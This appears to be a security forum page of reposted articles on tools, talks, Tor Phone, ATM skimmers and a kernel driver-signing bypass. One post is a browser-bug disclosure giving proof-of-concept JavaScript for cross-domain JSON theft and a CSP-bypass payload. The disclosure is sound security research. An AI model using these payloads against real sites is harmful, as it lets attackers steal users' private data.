Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. Da, exemplu clasic de "PE Backdoor", a uitat insa sa faca "Realign PE Header" (Nr. of Section, Size of code... o sa difere), insa functioneaza.
  2. Epic!
  3. A incerca cineva 3.4? Merge? Folositi o masina virtuala pentru teste.
  4. I checked the code (not really in detail) and it looks like this: - It unloads the VirtualBox driver if it is already running - It loads a vulnerable VirtualBox driver -> WHICH IS SIGNED AND ALLOWED TO RUN (if you Download this https://github.com/hfiref0x/TDL/blob/master/Source/Furutaka/drv/vboxdrv_exploitable.sys and check it's properties you can see this) - Exploit a vulnerability in the vulnerable driver - Execute a shellcode in the kernel-context -> Here you are able to load (minimal) another kernel module This is the bypass of the "Driver Signature Enforcement" avoiding the PatchGuard (as DSEFix would trigger). I am not really sure what I say is true, if I will have some time, I will take a more detailed look.
  5. Nu folositi mizeria de Bundle (Firefox).
  6. Last useful stuff I saw on this subject was this one: http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html And you should also check this: https://github.com/hfiref0x/TDL However, I think they are working from time to time on this, so even if some bypasses are found, they are "probably" fixed. Also, you should take in consideration from here: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/driver-signing Note Windows 10 for desktop editions (Home, Pro, Enterprise, and Education) and Windows Server 2016 kernel-mode drivers must be signed by the Windows Hardware Dev Center Dashboard, which requires an EV certificate. For details, see Driver Signing Changes in Windows 10. Also, check this: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later- Tools: https://github.com/tandasat/PgResarch and https://github.com/tandasat/findpg
  7. DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigation and perform incident response. DFF follows three main goals : Modularity In contrary to the monolithic model, the modular model is based on a core and many modules. This modular conception presents two advantages : it permits to improve rapidly the software and to split easily tasks for developers. Scriptability It is obvious that the ability to be scripted gives more flexibility to a tool, but it also enables automation and gives the possibility to extend features Genericity the project tries to remain Operating System agnostic. We want to help people where they are ! Letting them choose any Operating System to use DFF. Amongst supported features of DFF : Automated analysis Mount partitions, file systems and extract files metadata and other usefull information in an automated way. Generate an HTML report with System & User activity Direct devices reading support Supported forensic image file formats AFF, E01, Ex01, L01, Lx01, dd, raw, bin, img Supported volumes & File systems with unallocated space, deleted items, slack space, ... DOS, GPT, VMDK, Volume Shadow Copy, NTFS, HFS+, HFSX, EXT2, EXT3, EXT4, FAT12, FAT16, FAT32 Embeded viewers for videos, images, pdf, text, office documents, registry, evt, evtx, sqlite, ... Outlook and Echange mailboxes (PAB, PST, OST) Metadata extraction Compound files (Word, Excel, Powerpoint, MSI, ...) Windows Prefetch Exif information LNK Browser history Firefox, Chrome, Opera System & Users activity connected devices, user accounts, recent documents, installed software, network, ... Volatile memory analysis with graphical interface to Volatility Videos thumbnails generation Support for Sqlite, Windows Registry, Evt and Evtx Full Skype analysis (Sqlite and old DDB format) Timeline based on all gathered timestamps (file systems and metadata) Hashset supports with automatic "known bad", "known good" tagging Mount functionnality to access recovered files and folders from your local system In place carving ... Sursa: https://github.com/arxsys/dff
      • 2
      • Upvote
  8. Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Description Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like "drozer" that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent. Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device. Needle is open source software, maintained by MWR InfoSecurity. Link: https://github.com/mwrlabs/needle
  9. hunter (l)user hunter using WinAPI calls only Introduction: During Red Team engagments it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user (no matter how, always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he is a local administrator in any box, to which groups he belongs, if he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout. You might be thinking, "use Powerview". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware how powerfull PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this. To avoid using multiple old school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the amount of tools uploaded to compromised systems I created a simple tool that doesn't require Administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with white list bypass and process evasion, but I'll leave that for another day. Link: https://github.com/fdiskyou/hunter
      • 2
      • Upvote
  10. BSLV16 BSidesLV 77 videos 446 views Last updated on Nov 17, 2016 Opening Keynote Pt. I & II - Lorrie Cranor-FTC, Michael Kaiser-NCSA by BSidesLV 36:18 Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb by BSidesLV 26:27 Managing Security with the OWASP Assimilation Project - Alan Robertson by BSidesLV 40:17 Toward Better Password Requirements - Jim Fenton by BSidesLV 56:33 Data Science or Data Pseudo-Science? - Ken Westin by BSidesLV 41:51 I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman by BSidesLV 23:33 Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis by BSidesLV 1:28:31 Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari by BSidesLV 29:19 Intro to Storage Security, Looking Past the Server - Jarett Kulm by BSidesLV 24:47 Are You a PenTexter? - Peter Mosmans, Melanie Rieback by BSidesLV 43:41 Deep Adversarial Architectures for Detecting *and Generating) Maliciousness - Hyrum Anderson by BSidesLV 39:09 I Am The Cavalry Panel: Progress on Cyber Safety by BSidesLV 35:50 Welcome to The World of Yesterday, Tomorrow! - Joel Cardella by BSidesLV 46:46 Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson by BSidesLV 49:06 Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis by BSidesLV 55:23 Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It by BSidesLV 23:07 How to Get and Maintain your Compliance without ticking everyone off - Rob Carson by BSidesLV 23:13 What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh by BSidesLV 35:32 Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman by BSidesLV 55:08 State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, BeauWoods by BSidesLV 56:46 State Of Automotive Cyber Safety - IATC - Joshua Corman by BSidesLV 48:53 DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer by BSidesLV 25:44 Defeating Machine Learning: Systemic Deficiencies for Detecting Malware by BSidesLV 45:14 Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage by BSidesLV 46:23 CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman by BSidesLV 47:56 Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats by BSidesLV 52:51 Evaluating a password manager - Evan Johnson by BSidesLV 31:26 Why does everyone want to kill my passwords? - Mark Burnett by BSidesLV 32:11 How to make sure your data science isn't vulnerable to attack - Leila Powell by BSidesLV 57:19 DYODE: Do Your Own DiodE for Industrial Control Systems - AryKokos, Arnaud Soullie by BSidesLV 43:10 Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt by BSidesLV 1:00:45 Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer by BSidesLV 32:23 IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods by BSidesLV 12:44 Mapping the Human Attack Surface - Louis DiValentin (Master Chen) by BSidesLV 26:19 Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor by BSidesLV 29:57 Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter by BSidesLV 47:07 Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone by BSidesLV 39:07 A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland by BSidesLV 23:19 No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh by BSidesLV 52:34 Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett by BSidesLV 26:10 Powershell-Fu - Hunting on the Endpoint - Chris Gerritz by BSidesLV 27:38 Labeling the VirusShare Corpus: Lessons Learned - John Seymour by BSidesLV 30:21 There is no security without privacy - Craig Cunningham by BSidesLV 30:35 Survey says…Making progress in the Vulnerability Disclosure Debate - Allan Friedman by BSidesLV 1:27:38 Domains of Grays - Eric Rand by BSidesLV 38:29 Automated Dorking for Fun and Pr^wSalary - Filip Reesalu by BSidesLV 13:17 [Private Video] You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling by BSidesLV 28:29 Six Degrees of Domain Admin... - Andy Robbins, Will Schroeder, Rohan Vazarkar by BSidesLV 51:51 Uncomfortable Approaches - Joshua Corman, Beau Woods by BSidesLV 45:37 Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay by BSidesLV 26:37 PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven by BSidesLV 16:22 CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers by BSidesLV 41:12 Hacking Megatouch Bartop Games - Mark Baseggio by BSidesLV 34:54 Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation by BSidesLV 58:58 Is that a penguin in my Windows? - Spencer McIntyre by BSidesLV 39:48 Automation Plumbing - Ashley Holtz & Kyle Maxwell by BSidesLV 25:06 Disclosing Passwords Hashing Policies - Michal Spacek by BSidesLV 33:12 PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan by BSidesLV 51:00 Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett by BSidesLV 56:15 An Evolving Era of Botnet Empires - Andrea Scarfo by BSidesLV 28:28 Building an EmPyre with Python - Steve Borosh Alexander Rymdeko-Harvey, Will Schroeder by BSidesLV 50:19 Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs by BSidesLV 22:38 Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff by BSidesLV 47:31 The Deal with Password Alternatives - Terry Gold by BSidesLV 55:15 QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? by BSidesLV 1:04:23 Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology by BSidesLV 31:27 One Compromise to Rule Them All - Bryce Kunz by BSidesLV 53:00 The Future of Bsides - Panel Session by BSidesLV 52:46 What's Up Argon2? The Password Hasing Winner A Year Later - JP Aumasson by BSidesLV 24:59 Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data by BSidesLV 42:58 I Love my BFF (Brute Force Framework) - Kirk Hayes by BSidesLV 24:06 Proactive Password Leak Processing - Bruce Marshall by BSidesLV Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) by BSidesLV 22:21 Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) by BSidesLV 25:20 Pushing Security from the Outside - Kat Sweet, Chris DeWeese by BSidesLV 26:19 Why it's all snake oil - and that may be ok - Andrew Morris by BSidesLV 46:44 Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM
      • 2
      • Upvote
  11. Friday, November 25, 2016 JSON hijacking for the modern web Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be patched well in Firefox however I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__ they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__. Like so: <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name); } })); </script> <script src="external-script-with-undefined-variable"></script> <!-- script contains: stealme --> Edge PoC stealing undefined variable If you include a cross domain script with stealme in, you will see it alerts the value even though it's an undefined variable. After further testing I found you can achieve the same thing overwriting __proto__.__proto__ which is [object EventTargetPrototype] on edge. <script> __proto__.__proto__=new Proxy(__proto__,{ has:function(target,name){ alert(name); } }); </script> <script src="external-script-with-undefined-variable"></script> Edge PoC stealing undefined variable method 2 Great so we can steal data x-domain but what else can we do? All major browsers support the charset attribute on script, I found that the UTF-16BE charset was particularly interesting. UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going? Lets say we have a response from the web server that returns an array literal and we can control some of it. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above. The only caveat is that the resulting characters when combined must form a valid JavaScript variable. For example let's take a look at the following response: ["supersecret","input here"] To steal supersecret we need to inject a NULL character followed by two a's, for some reason Edge doesn't treat it as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing or maybe it's truncating the response and the characters after NULL are not a valid JS variable on Edge I'm not sure but in my tests it seems to require a NULL and padded out with some characters. See below for an example: <!doctype HTML> <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } })); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] --> Edge PoC stealing JSON feeds So we proxy the __proto__ property as before, include the script with a UTF-16BE charset and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by bit shifting by 8 to obtain the first byte and bitwise AND to obtain the second byte. The result is an alert popup of ["supersecret"," as you can see Edge seems to truncate the response after the NULL. Note this attack is fairly limited because many characters when combined do not produce a valid JavaScript variable. However it may be useful to steal small amounts of data. Stealing JSON feeds in Chrome It gets worse. Chrome is far more liberal with scripts that have a exotic charset. You don't need to control any of the response in order for Chrome to use the charset. The only requirement is that as before the characters combined together produce a valid JavaScript variable. In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to have prevented overwriting the __proto__ however they forgot how deep the __proto__ goes... <script> __proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ var str = f.caller.toString(); alert(str.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","abc"] --> NOTE: This was fixed in Chrome 54 Chrome PoC stealing JSON feeds works in version 53 We go 5 levels deep down the __proto__ chain and overwrite it with our proxy, then what happens next is interesting, although the name argument doesn't contain our undefined variable the caller of our function does! It returns a function with our variable name! Obviously encoded in UTF-16BE, it looks like this: function 嬢獵灥牳散牥琢Ⱒ慢挢崊 Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returns a different domain (maybe Chrome extension context). When adblock plus was enabled I saw some extension code using this method but was unable to exploit it since it appeared to be just code injecting into the current document. In my tests I was also able to include xml or HTML data cross domain even with text/html content type which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome. Stealing JSON feeds in Safari We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller. <script> __proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> Safari PoC stealing JSON feeds After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__. Hacking JSON feeds without JS proxies I mentioned that the UTF-16BE charset works in every major browser, how can you hack JSON feeds without JS proxies? First you need to control some of the data and the feed has to be constructed in such a way that it produces a valid JavaScript variable. To get the first part of the JSON feed before your injected data is pretty easy, all you do is output a UTF-16BE encoded string which assigns the non-ASCII variable to a specific value and then loop through the window and check if this value exists then the property name will contain all the JSON feed before your injection. The code looks like this: =1337;for(i in window)if(window[i]===1337)alert(i) This code is then encoded as a UTF-16BE string so we actually get the code instead of a non-ASCII variable. In effect this means just padding each character with a NULL. To get the characters after the injected string I simply use the increment operator and make the encoded string after a property of window. Then we call setTimeout and loop through the window again but this time checking for NaN which will have a variable name of our encoded string. See below: setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}))}catch(e){}}});++window.a I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. The whole JSON feed will look like this: {"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"} Hacking JSON feeds without proxies PoC Bypassing CSP As you might have noticed a UTF-16BE converted string will also convert new lines to non-ASCII variables, this gives it potential to even bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that injects into itself, has an encoded assignment and payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference same domain (which is the majority of policies). The HTML document will have to look like this: <!doctype HTML><html> <head> <title>Test</title> <?php echo $_GET['x']; ?> </head> <body> </body> </html> Notice there is no new line after the doctype, the HTML is constructed in such a way that it is valid JavaScript, the characters after the injection don't matter because we inject a trailing single line JavaScript comment and the new lines are converted too. Note that there is no charset declared in the document, this isn't because the charset matters it's because the quotes and attributes of the meta element will break the JavaScript. The payload looks like this (note the tab is required in order to construct a valid variable) <script%20src="index.php?x=%2509%2500%253D%2500a%2500l%2500e%2500r%2500t%2500(%25001%2500)%2500%253B%2500%252F%2500%252F"%20charset="UTF-16BE"></script> Note: This has been patched on later versions of PHP, it defaults to the UTF-8 charset for text/html content type therefore prevents attack. However I've simply added a blank charset to the JSON response so it still works on the lab. CSP bypass using UTF-16BE PoC Other charsets I fuzzed every browser and charset. Edge was pretty useless to fuzz because as mentioned previously does some sort of charset sniffing and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating especially because the dev tools let you filter the results of console by a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable but it is even more brittle than the UTF-16BE. Still I managed to get the following XML to import correctly on Chrome. <root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window) && typeof window===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root> The above no longer works in Chrome but I've included it as another example. UTF-16 and UTF-16LE looked useful too since the output of the script looked like a JavaScript variable but they caused invalid syntax errors when including a doctype, xml or a JSON string. Safari had a few interesting results too but in my tests I couldn't get it produce valid JavaScript. It might be worth exploring further but it will be difficult to fuzz since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively. CSS You might think this technique could be applied to CSS and in theory it should, since any HTML will be converted into non-ASCII invalid CSS selector but in reality browsers seem to look at the document to see if there's a doctype header before parsing the CSS with the selected charset and ignore the stylesheet, making a self injected stylesheet fail. Edge, Firefox and IE in standards mode also seem to check the mime type, Chrome says the stylesheet was interpreted but at least in my tests it didn't seem that way. Mitigation The charset attacks can be prevented by declaring your charset such as UTF-8 in an HTTP content type header. PHP 5.6 also prevent these attacks by declaring a UTF-8 charset if none is set in the content-type header. Conclusion Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response. Enjoy - @garethheyes Posted by Gareth Heyes at 10:03 AM Sursa: http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html
      • 1
      • Upvote
  12. Agenda 1. Introduction (Jason) 2. Compute Architecture Evolution (Jason) 3. Chip Level Architecture (Jason)  Subslices, slices, products 4. Gen Compute Architecture (Maiyuran)  Execution units 5. Instruction Set Architecture (Ken) 6. Memory Sharing Architecture (Jason) 7. Mapping Programming Models to Architecture (Jason) 8. Summary Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf
      • 1
      • Upvote
  13. The Tor Phone prototype: a truly private smartphone? 29 NOV 2016 Get the latest security news in your inbox. by Bill Camarda The Tor Project has long offered high-security alternatives for folk who are especially concerned about their privacy. But as the world goes mobile, and is increasingly accessed through smartphones, users become vulnerable to a whole new set of compromises. That’s where the Tor Phone prototype comes in – and it’s just been significantly improved. According to developer Mike Perry, Tor Phone aims: …to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users. It’s also “meant to show that it is still possible to replace and modify your mobile phone’s operating system while retaining verified boot security – though only just barely”. Tor Phone starts with Copperhead OS, an open-source Android fork focused on security. As Perry writes: Copperhead is also the only Android ROM that supports Verified Boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions… Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected). Therein lies a huge obstacle to Tor Phone deployment, however. Together with Copperhead, Tor Phone installs the Orbot Tor proxy app, OrWall firewall, F-Droid alternative app repository, additional tools, and finally, Google Play (primarily, Perry says, so you can retrieve the Signal app for encrypted voice calling and instant messaging). Its components must install to the system partition. Therefore, says Perry: We must re-sign the Copperhead image and updates… to [maintain] system integrity from Verified Boot. Unfortunately, only selected Google Nexus/Pixel devices let users control this with their own keys, while still supporting Verified Boot. So you can’t do this with your own cheap-o Android device, no matter how strong your Linux and related skills are – what’s more, a quick look at the directions confirms that setting up Tor Phone is non-trivial. You can jumpstart the process by purchasing a smartphone with Copperhead pre-installed – for the moment, of course, while supplies last. And, with the right hardware, says Perry, Tor Phone works: notwithstanding some “rough edges,” he relies on his right now. Sophos Home Free home computer security software for all the family Learn More Why bother with all this? Perry and Tor argue that Google is increasingly moving to lock down the Android platform, claiming it’s the only way to overcome Android’s “fragmentation and resulting insecurity”. Tor argues instead for a strategy based on transparency: [As] more components and apps are moved to closed source versions, Google [reduces] its ability to resist the demand that backdoors be introduced. Those might come from nefarious governments, of course. But, in Ars Technica, Perry notes that untraceable backdoors might also be introduced by hackers purely interested in financial gain. This is less likely, he argues, if a mobile OS remains fully open… We are concerned that the freedom of users to use, study, share, and improve the operating system software on their phones is being threatened. If we lose these freedoms on mobile, we may never get them back. For Tor Phone to gain traction, it’ll probably need to run on more than a couple of high-end devices manufactured by Google itself. In Ars Technica, Perry stresses that Tor won’t enter the secure hardware business. But someone could, he says, citing the crowdfunded Neo900 project as a model: What I’ve found is that posts like [his Tor Phone update] energise the Android hobbyist/free software ecosystem, and make us aware of each other and common purpose. If you’re thinking “sounds like there’s a long way to go,” Perry might agree. He named his current prototype “Mission Improbable”. But that’s big progress: he named the previous prototype “Mission Impossible”. Follow @NakedSecurity Sursa: https://nakedsecurity.sophos.com/2016/11/29/the-tor-phone-prototype-a-truly-private-smartphone/
  14. testssl.sh: Testing TLS/SSL encryption Name Last Modified Size Type legacy-2.6/ 2016-Nov-13 12:37:56 -- Directory openssl-1.0.2i-chacha.pm.ipv6.contributed/ 2016-Sep-26 23:15:22 -- Directory CHANGELOG.txt 2015-Sep-15 10:56:45 12.27KB TXT Type Document LICENSE.txt 2014-May-03 11:04:22 17.59KB TXT Type Document OPENSSL-LICENSE.txt 2015-Oct-13 00:12:23 58.08KB TXT Type Document bash-heartbleed.changelog.txt 2014-May-03 17:37:15 572.00B TXT Type Document bash-heartbleed.sh 2015-Oct-27 15:11:18 3.98KB SH File ccs-injection.sh 2014-Jun-14 23:44:42 3.94KB SH File mapping-rfc.txt 2014-Dec-21 00:52:13 15.88KB TXT Type Document openssl-1.0.2e-chacha.pm.tar.gz 2015-Sep-15 09:23:07 11.65MB GZ Compressed Archive openssl-1.0.2e-chacha.pm.tar.gz.asc 2015-Sep-16 01:17:54 828.00B ASC File openssl-1.0.2i-chacha.pm.ipv6.Linux+FreeBSD.tar.gz 2016-Jun-23 11:34:57 9.45MB GZ Compressed Archive openssl-1.0.2i-chacha.pm.ipv6.Linux+FreeBSD.tar.gz.asc 2016-Jun-23 11:33:36 811.00B ASC File openssl-ms14-066.Linux.x86_64 2016-Apr-15 12:36:23 4.24MB X86_64 File openssl-rfc.mappping.html 2016-Feb-06 16:19:09 57.88KB HTML File testssl.sh 2016-Nov-20 19:26:02 427.82KB SH File testssl.sh is a free command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more. Version 2.8 is being finalized. 2.6 is outdated, has more bugs and less features. Please checkout 2.8rc3 @ github or download the stable 2.8rc3 version from here Key features Clear output: you can tell easily whether anything is good or bad Ease of installation: It works for Linux, Darwin, FreeBSD and MSYS2/Cygwin out of the box: no need to install or configure something, no gems, CPAN, pip or the like. Flexibility: You can test any SSL/TLS enabled and STARTTLS service, not only webservers at port 443 Toolbox: Several command line options help you to run YOUR test and configure YOUR output Reliability: features are tested thoroughly Verbosity: If a particular check cannot be performed because of a missing capability on your client side, you'll get a warning Privacy: It's only you who sees the result, not a third party Freedom: It's 100% open source. You can look at the code, see what's going on and you can change it. Heck, even the development is open (github) Link: https://testssl.sh/
  15. Malware Sample Sources for Researchers Malware researchers have the need to collect malware samples to research threat techniques and develop defenses. Researchers can collect such samples using honeypots. They can also download samples from known malicious URLs. They can also obtain malware samples from the following sources: Contagio Malware Dump: Free; password required Das Malwerk: Free FreeTrojanBotnet: Free; registration required KernelMode.info: Free; registration required MalShare: Free; registration required Malware.lu’s AVCaesar: Free; registration required MalwareBlacklist: Free; registration required Malware DB: Free Malwr: Free; registration required Open Malware: Free theZoo aka Malware DB: Free Virusign: Free VirusShare: Free Be careful not to infect yourself when accessing and experimenting with malicious software! My other lists of online security resources outline Automated Malware Analysis Services and On-Line Tools for Malicious Website Lookups. Also, take a look at tips sharing malware samples with other researchers. Updated November 28, 2016 Sursa: https://zeltser.com/malware-sample-sources/
      • 2
      • Upvote
  16. ATM Insert Skimmers: A Closer Look KrebsOnSecurity has featured multiple stories about the threat from ATM fraud devices known as “insert skimmers,” wafer-thin data theft tools made to be completely hidden inside of a cash’s machine’s card acceptance slot. For a closer look at how stealthy insert skimmers can be, it helps to see videos of these things being installed and removed. Here’s a look at promotional sales videos produced by two different ATM insert skimmer peddlers. Traditional ATM skimmers are fraud devices made to be placed over top of the cash machine’s card acceptance slot, usually secured to the ATM with glue or double-sided tape. Increasingly, however, more financial institutions are turning to technologies that can detect when something has been affixed to the ATM. As a result, more fraudsters are selling and using insert skimming devices — which are completely hidden from view once inserted into an ATM. The fraudster demonstrating his insert skimmer in the short video above spends the first half of the demo showing how a regular bank card can freely move in and out of the card acceptance slot while the insert skimmer is nestled inside. Toward the end of the video, the scammer retrieves the insert skimmer using what appears to be a rather crude, handmade tool thin enough to fit inside a wallet. A sales video produced by yet another miscreant in the cybercrime underground shows an insert skimmer being installed and removed from a motorized card acceptance slot that has been fully removed from an ATM so that the fraud device can be seen even while it is inserted. In a typical setup, insert skimmers capture payment card data from the magnetic stripe on the backs of cards inserted into a hacked ATM, while a pinhole spy camera hidden above or beside the PIN pad records time-stamped video of cardholders entering their PINs. The data allows thieves to fabricate new cards and use PINs to withdraw cash from victim accounts. Covering the PIN pad with your hand blocks any hidden camera from capturing your PIN — and hidden cameras are used on the vast majority of the more than three dozen ATM skimming incidents that I’ve covered here. Shockingly, few people bother to take this simple and effective step, as detailed in this skimmer tale from 2012, wherein I obtained hours worth of video seized from two ATM skimming operations and saw customer after customer walk up, insert their cards and punch in their digits — all in the clear. Once you understand how stealthy these ATM fraud devices are, it’s difficult to use a cash machine without wondering whether the thing is already hacked. The truth is most of us probably have a better chance of getting physically mugged after withdrawing cash than encountering a skimmer in real life. However, here are a few steps we can all take to minimize the success of skimmer gangs. -Cover the PIN pad while you enter your PIN. -Keep your wits about you when you’re at the ATM, and avoid dodgy-looking and standalone cash machines in low-lit areas, if possible. -Stick to ATMs that are physically installed in a bank. Stand-alone ATMs are usually easier for thieves to hack into. -Be especially vigilant when withdrawing cash on the weekends; thieves tend to install skimming devices on a weekend — when they know the bank won’t be open again for more than 24 hours. -Keep a close eye on your bank statements, and dispute any unauthorized charges or withdrawals immediately. If you liked this piece and want to learn more about skimming devices, check out my series All About Skimmers. Sursa: https://krebsonsecurity.com/2016/11/atm-insert-skimmers-a-closer-look/
      • 2
      • Upvote
